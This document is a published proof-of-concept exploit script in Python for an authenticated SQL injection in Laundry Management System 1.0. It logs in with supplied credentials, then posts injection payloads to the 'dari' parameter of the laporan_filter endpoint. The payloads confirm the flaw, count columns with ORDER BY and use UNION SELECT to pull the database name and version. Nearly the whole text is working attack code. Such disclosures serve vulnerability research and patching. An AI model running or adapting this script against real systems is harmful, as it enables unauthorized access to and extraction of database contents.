# Exploit Title: Laundry Management System 1.0 - Authenticated SQL Injection # Date: 29-06-2022 # Exploit Author: syad # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ci_laundry.zip # Version: 1.0 # Tested on: Windows 10 + XAMPP 3.2.4 # CVE ID : N/A # Description # The dari parameter does not perform input validation on the laporan_filter.php file it allow authenticated SQL Injection import sys import requests sess = requests.Session() proxies = {"https": "", "http": ""} def login(ip,username,password): target = "http://%s/ci_laundry/welcome/login" % ip daftar = {'username':username,'password':password} masuk = sess.post(target, data=daftar, proxies=proxies) if "Dashboard" in masuk.text: print("[$] Success Login :)") else: return False def trigger_sqli(ip): target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip sql = {"dari":"1'",'sampai':'123'} test = sess.post(target, data=sql, proxies=proxies) if "You have an error in your SQL syntax" in test.text: print("[$] Trigger SQL Injection !!!! :)") else: return False def count_column(ip): target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip sql = {"dari":"1' ORDER BY 14-- -",'sampai':'123'} test = sess.post(target, data=sql, proxies=proxies) if test.status_code == 200: print("[$] Found 14 Column In Database !!! :)") def got_database_name(ip): target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip sql = {"dari":"1' union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14-- -",'sampai':'123'} test = sess.post(target, data=sql, proxies=proxies) if "laundry_db" in test.text: print("[$] Found Database Name is => laundry_db") def got_version_data(ip): target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip sql = {"dari":"1' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14-- -",'sampai':'123'} test = sess.post(target, data=sql, proxies=proxies) if "10.4.24-MariaDB" in test.text: print("[$] Found Version Database is => 10.4.24-MariaDB") if __name__ == "__main__": try: ip = sys.argv[1].strip() username = sys.argv[2].strip() password = sys.argv[3].strip() except IndexError: print("[-] Usage %s " % sys.argv[0]) print("[-] Example: %s 192.168.1.x admin admin123" % sys.argv[0]) sys.exit(-1) login(ip,username,password) trigger_sqli(ip) count_column(ip) got_database_name(ip) got_version_data(ip)